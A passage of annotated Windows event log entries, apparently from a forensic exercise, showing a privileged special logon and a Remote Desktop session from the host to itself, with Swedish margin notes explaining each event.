Logon ID:       0x2946DE
Linked Logon ID:    0x294711
Network Account Name:   -
Network Account Domain: -
Logon GUID:     {f784b907-a9f4-df59-7b04-71c16fca0a47}

Process Information:
Process ID:     0x360
Process Name:       C:\Windows\System32\svchost.exe

Network Information:
Workstation Name:   PONGO
Source Network Address: 172.30.1.85
Source Port:        0

Detailed Authentication Information:
Logon Process:      User32 
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only):   -
Key Length:     0

Log Name:      Security
Source:        Microsoft-Windows-Security-Auditing
Date:          2017-09-13 12:50:10
Event ID:      4672 <--
Task Category: Special Logon
Level:         Information
Keywords:      Audit Success
User:          N/A
Computer:      pongo.hominidae.org
Description:
Special privileges assigned to new logon.   <-- Priviligierat konto

Subject:
Security ID:        HOMINIDAE\apan.apansson
Account Name:       apan.apansson
Account Domain:     HOMINIDAE
Logon ID:       0x2946DE

Privileges:     SeSecurityPrivilege <-- Priviligierat konto / Admin
        SeTakeOwnershipPrivilege
        SeLoadDriverPrivilege
        SeBackupPrivilege
        SeRestorePrivilege
        SeDebugPrivilege
        SeSystemEnvironmentPrivilege
        SeImpersonatePrivilege

Log Name:      Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
Source:        Microsoft-Windows-TerminalServices-LocalSessionManager
Date:          2017-09-13 12:50:11
Event ID:      25
Task Category: None
Level:         Information
Keywords:      
User:          SYSTEM
Computer:      pongo.hominidae.org
Description:
Remote Desktop Services: Session reconnection succeeded:

User: HOMINIDAE\apan.apansson
Session ID: 1
Source Network Address: 172.30.1.85 <-- RDP till sig själv

Log Name:      Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin
Source:        Microsoft-Windows-TerminalServices-RemoteConnectionManager
Date:          2017-09-13 12:49:37
Event ID:      1158
Task Category: None
Level:         Information
Keywords:      
User:          NETWORK SERVICE
Computer:      pongo.hominidae.org
Description:
Remote Desktop Services accepted a connection from IP address 172.30.1.85.  <-- RDP till sig själv

Log Name:      Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational
Source:        Microsoft-Windows-RemoteDesktopServices-RdpCoreTS
Date:          2017-09-13 12:49:07
Event ID:      131
Task Category: RemoteFX module
Level:         Information
Keywords:      
User:          NETWORK SERVICE
Computer:      pongo.hominidae.org
Description:
The server accepted a new TCP connection from client 172.30.1.85:52737. <-- RDP till sig själv